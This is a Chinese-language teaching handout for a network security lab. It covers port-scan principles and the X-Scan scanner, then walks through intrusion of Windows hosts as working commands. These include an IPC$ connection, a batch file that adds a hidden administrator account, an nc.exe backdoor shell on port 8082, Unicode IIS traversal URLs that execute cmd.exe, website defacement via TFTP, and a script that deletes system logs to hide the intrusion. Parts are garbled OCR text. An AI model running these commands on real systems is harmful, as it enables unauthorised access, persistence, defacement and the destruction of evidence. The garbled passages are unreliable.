网络安全扫描器及漏洞的入侵扫描

1、单元三网络系统的安全配置与管理项目五 网络安全扫描器及漏洞的入侵扫描教学目标了解安全扫描的的原理、作用和网络扫描工具X-scan、Superscan的主要原理；熟练掌握X-Scan、Superscan扫描器的使用，实现屏幕监视和控制和远程执行命令；掌握主机入侵方式及基于Unicode漏洞的入侵，提高计算机安全方面的安全隐患意识。教学要求认真听讲，专心操作，操作规范，认真记录实验过程，总结操作经验和写好实验报告，在实验中培 养严谨科学的实践操作习惯；遵守学校的实验室纪律，注意人身和设备的安全操作，爱护实验设备、及时上缴作业；教学环境：Windows 7以及Windows server2003/2

2、008以上操作系统。知识要点了解安全扫描的的原理、作用；理解网络扫描工具X-scan、Superscan的主要原理。；技术要点熟练掌握X-Scan、Superscan扫描器的使用，实现屏幕监视和控制和远程执行命令。掌握主机入侵方式及基于Unicode漏洞的入侵，提高计算机安全方面的安全隐患意识。技能训练讲授与示范正确启动计算机，在最后一个磁盘上建立以学号为名的文件夹，从指定的共享文件夹中将“实习指导书” 和其他内容复制到该文件夹中。（一）安全扫描的原理作用1）自动检测远程或本地主机安全脆弱点的程序；2）采用模拟攻击的形式对目标可能存在的已知安全漏洞进行逐项检查；3）并不是一个直接的攻击网络漏洞

3、的程序；功能发现一个主机和网络的能力；一旦发现一台主机，有发现什么服务正运行在这台主机上的能力；通过测 试这些服务，发现这些漏洞的能力。（二）端口扫描扫描器主要可分为基于主机的和基于网络的两种。真正的扫描器是TCP端口扫描器，可以连通TCP/IP端口和服务（比如，Telnet或FTP），并记录目标的 回答，搜集到关于目标主机的有用信息。TCP SYN 扫描原理：扫描程序发送的SYN数据包，准备打开一个新的连接并等待反映：一个SYN|ACK的返回信息表示 端口处于侦听状态，一个RST返回表示端口没有处于侦听状态。优点：不会在目标计算机上留下纪录。缺点：扫描程序必须要有root权限才能建立自己的S

4、YN数据包。TCP connect()扫描原理：利用操作系统提供connect()系统调用，与每一个感兴趣的目标计算机的端口进行连接，若端口 处于侦听状态，那么connect()就能成功。优点：系统中的任何用户都有权利使用这个调用；缺点：很容易被发现，目标计算机的logs文件会显示一连串连接和连接出错的消息，并且很快将它关闭。TCP FIN 扫描原理：利用关闭的端口会用适当的RST来回复FIN数据包，而打开的端口会忽略对FIN数据包的回复。优点：FIN数据包可以不惹任何麻烦的通过。缺点：这种方法和系统的实现有一定的关系，有些系统不论是打开的或关闭的端口对FIN数据包都要给 以回复，这种情况下该

5、方法就不实用了。扫描工具的应用使用X-SCAN扫描局域网主机原理X-Scan采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测，支持插件功能。扫描计算机的 端口、漏洞、某种服务、某个协议、系统密码，包括：远程服务类型、操作系统类型及版本，各种弱口令漏 洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等20多个大类。对于多数已知漏洞，给出了相应的 漏洞描述、解决方案及详细描述链接。通过扫描结果，可以了解的看到系统哪方面可能出现风险，比如密码太弱或者黑客可利用的漏洞等，以 便即使采取措施对计算机系统进行加固。X-Scan的使用任务1系统弱口令扫描要求：利用X-Scan实现主机系统的是否存在

6、NT弱口令(获取管理权限)步骤：系统安装及设置下载X-Scan，并解压，运行xscan_gui.exe，并且设置扫描地址“设置”一“扫描参数”一指定IP范围：-54。如图1所示：设置NT-Server弱口令全局设置一扫描模块一选择NT-Server等弱口令，如图2所示。-IE雄,:tltafeACfiBS 外中诿董图17;Iw并发扫描及扫描报告的设置选择“并发扫描”，可以设置要扫描的最大并发主机数，和最大的并发线程数。mm7m=WfeiftS :+: lit-ftB量士井丈主如an Lfct|s=-i Tfial=2i qjcl 球klar*x*!S*u=r|Mf=t-l-i| X选择扫描报告

7、，点击后会显示在右边的窗格中，它会生成一个检测IP或域名的报告文件，同时报告 的文件类型可以有3种选择，分别是HTML、TXT、XML。其他设置及端口设置有2种条件扫描：1，跳过没有响应的主机，2，无条件扫描，如图5。设置没有响应的主机：全局设置一其他设置一选中“跳过没有响应的主机”及其他相关；端口检测：插件设置一端口相关设置 一 待检测端口 7,9,13,19,21,22,20. 检测方式：SYN*4| .听 | 一 | 岫端口相关设置中可以自定义一些需要检测的端口。检测方式“TCP”、“SYN”两种，TCP方式容易被 对方发现，准确性要高一些，SYN则相反。 如图6所示。SNMP相关设置用

8、来针对SNMP信息的一些检测设置，在监测主机数量不多的时候可以全选，如图7所示;NETBIOS相关设置WINDOWS系统的NETBIOS信息的检测设置，包括的项目有很多种，根据实际需要进行选择，如图8。也足89 曰. tdSfl.B其恨模|也牛好W=L1H#-盼勺也福琅-扁RtiWT MjqiTfi 置aW0.Tsifiri5fl :；n：FiKBUDFIM.尊二字典文件设置是X-SCAN自带的一些用于破解远程账号所用的字典文件，这些字典都是简单或系统默认的账号等!申曰检:圆范围全局也再扫描相依并枝扫描扫4苗州片KkhiftS-问什设ELi刷口相关设置ENMF相关也盅HHTE工口混目关专也，向

9、橙MW膨主拔置:字典矣型字电毯件名匚vs用尸名字也 PTF/码宁境 FTF用尸名字奥 工MAI枯典 工MAT用户名手典 NNTI1密阿丰典 mrri1用户名学典 FQF3袍砖于曲KEXEC切;h4f -W 11E孙匚用户毛于典 邹日耙码手典 MB用尸名宁奥 mMTF 密典MTF用户名字貌 WiCES祐码丰史. (!. w mJc_ mx . d.i c . as a. -ii _l / 1诵定图9开始扫描-Scan v3.3 GUI文件 设置也)查看Q0工具(I) Language帮助. Oa 1-胡】心开蛤扫描村Z003主机j累计时间|插件时间活动线程当前进度图10扫描过程及扫描结果扫描结束

10、以后会自动弹出检测报告，包括漏洞的风险级别和详细的信息，以便我们对对方主机进行详细的分析。.1 I-SCiE 7k 1 G!TL I-Sen IfepGrt - lierotsoft Internet EepIdfst日回区J辨SIrt Ift Lsnw iIiQ 81 IU 1 王 hliwi m5 IT 10铝云41口令争 iWEirdSlniw/Crn 争5 td/E3J ECL IM W- M；蚓=旧查吉明物fcW _F.ii.胃可-主我堂枕T？.侦日.筒斜主。地比 端廿腋景腋员炯布10,L68J84.H4 raihhi(13rp) 第腕坐丽hl9业1手由.凶 曲r-H下午m ：D屿s

11、顼irri Tt w也推ww.疟Max 5神3t5jtI.ME8 JiHES惟诣K勺 i ekks TfiDnJBL JE6. BE. H.W Ml 正喜tSBTMT-名twti?亨 rrtRi LiFte ?;打开“我的电脑”则多了一个Z盘，即为目标主机的C盘，查找Z盘的指定文件断开所有的IPC$连接net use */delnet use 目标机地址ipc$del/删除指定主机2）建立后门帐号编写BAT文件hack.bat，内容为：net use sysback 123456/add/帐号和密码net localgroup administrators sysback /add与目标主机建

12、立IPC$连接复制文件到目标主机copy hack.bat 192.168.1.Xd$实现文件hack.bat拷贝到目标主机的D盘查看目标主机时间：net time 192.168.1.X通过计划任务远程主机执行hack.bat文件，根据目标机的时间往后推几分种执行:at192.168.1.X 时间 d:hack.bat运行 hack.batnet use */del断开 IPC$连接验证帐号sysback是否成功建立net use 192.168.1.Xipc$ 123456 /user:sysback说明：若能建立连接则说明管理帐号 sysback ”成功创建3）NC连接操作用到的工具可以

13、是：nc （打开后门程序），前提关闭杀毒软件（网上自行下载该工具）建立空连接格式：net use对方 ipipc$ “口令” /user: “用户名” 例：net use 192.168.0.Xipc$ 123 /user:administrator将后门程序（nc）拷贝到对方计算机copy nc.exe、对方 ipadmin$system32（拷贝到system32的原因：是环境变量path=c:winntsystem32;查看环境变量：我的电脑 属性-高 级一环境变量一系统环境变量 系统缺省下的路径%SystemRoot%system32;%SystemRoot%;）例：copy c:nc

14、.exe 06admin$system32查看对方系统当前时间格式：net time对方ip例：net time08定时启动nc程序根据第三步时间之后2, 3分钟之后，定时在对方机子上启动nc程序：例：at对方 IP 10： 00 nc.exe -d -l -p 8082 -e cmd.exe-d： -l： -p：在8082端口上等待的连接；-e cmd.exe：以命令行方式运行）；at对方IP：在自己机子上查看是否执行；at :在对方机子上查看是否执行；连接对方的8082端口nc 对方 IP 8082（检查是否连接对方：ipconfig看本地连接是否为对方IP；添加用户和组等）关闭对方计算机

15、Shutdown 对方IP T:20 （20秒后自动关闭对方计算机）任务4基于Unicode漏洞的入侵（IIS漏洞）要求：使用Unicode编码实现网站“涂鸦”（目标系统windows2000）步聚：1）扫描远程服务器运用X-scan扫描远程服务器，寻找有漏洞的主机填好“指定IP范围”，在“全局设置”中“扫描模块”选择“漏洞检测脚本”后，进行扫描2）制作标语使用DreamWewaver制作一个标语网页，保存为1.htm，内容自定义。3）远程服务器的根目录准定IE地址输入：http:/目标 ip 地址/scripts/.%c0%2f./windows/system32/cmd.exe?/c+di

16、r+c:mmc.gif/sDirectoiy of C:inetpubs.cripts2000-09-23 15:49DiR）.理2000-09-8 15:49 俗 IR ./s加在dir目录命令后：表示查找指定文件或文件夹的物理路径dir+ c:mmic.gif:表示在远程服务的C盘中查找mmc.gif文件，该文件在IIS默认安装中，若找到 即可找到WEB根目录。编码为 “c1%1c ”或“e0%2f”4）遍历根目录下的文件，涂鸦主页1）漏洞检测，查找主页手工检测IE地址输入：http:/ 服务器 IP 地址/scripts/.%c0%2f./windows/system32/cmd.exe

17、?/c+dir +c:inetpubwwwroothttp:/ 目标 IP/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot主页名：index.htm, index.html,default.asp,default.htm等工具检测：X-Scan检测该漏洞，通过扫描得到/script/.%c1%1c./winnt/system32/cmd.exe?/c+dir2）上传自制主页下载Tftpd32工具，运行tftpd32服务器，只需将自制页面1.htm复制到tftpd服务器的路径下即可：格式：Tftp-ihostGETP

18、UT souresdestination参数：-i二进制文件传输；host是Tftp服务器地址；get指下载文件；put指上传文件；Source指文 件名；Destination指目的地。例：http:/ 目标 ip 地址/scripts/.%c0%2f./windows/system32/cmd.exe?/c+tftp+本机 ip + get+1.htm+c:inetpubwwwrootindex.htm。3）重新登录远程主机的网站，即为1.htm主页的内容4.清除入侵信息入侵者在利用unicode漏洞入侵后，在离开远程服务器前，需要清除服务器的日志文件BAT文件：del+C:winntsystem32logfiles*.*del+C:winntsystem32config*.evtdel+C:winntsystem32dtclog*.*del+C:winntsystem32*.logdel+C:winntsystem32*.txtdel+C:winnt*.txtdel+C:winnt*.log操作：通过TFTP服